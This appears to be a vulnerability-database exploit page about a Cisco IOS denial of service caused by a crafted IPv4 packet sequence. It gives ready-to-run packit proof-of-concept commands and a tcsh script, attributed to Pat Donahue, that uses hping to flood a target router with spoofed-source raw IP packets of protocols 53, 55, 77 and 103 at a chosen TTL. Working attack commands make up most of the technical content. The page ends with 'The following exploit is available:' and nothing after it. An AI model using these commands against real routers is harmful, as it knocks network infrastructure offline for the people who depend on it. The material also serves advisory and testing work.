|
|
Cisco IOS Malicious IPV4 Packet Sequence Denial Of Service Vulnerability
CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild. This issue can be exploited with utilities such as hping, so specific exploit code is not required to exploit this issue. The following proof-of-concept has been provided to reproduce the vulnerability using packit 0.6.0d and later: packit -t RAWIP -V 53 -d dst_ip -T ttl packit -t RAWIP -V 55 -d dst_ip -T ttl packit -t RAWIP -V 77 -d dst_ip -T ttl packit -t RAWIP -V 103 -d dst_ip -T ttl The following shell script has been made available by Pat Donahue: --- #!/bin/tcsh -f if ($1 == "" || $2 == "") then echo "usage: $0 <router hostname|address> <ttl>" exit endif foreach protocol (53 55 77 103) /usr/local/sbin/hping $1 --rawip --rand-source --ttl $2 --ipproto $protocol --count 19 --interval u250 --data 26 end --- Additional exploits have been made available by Michal Zalewski and Martin Kluge. The following exploit is available: |
|
Privacy Statement |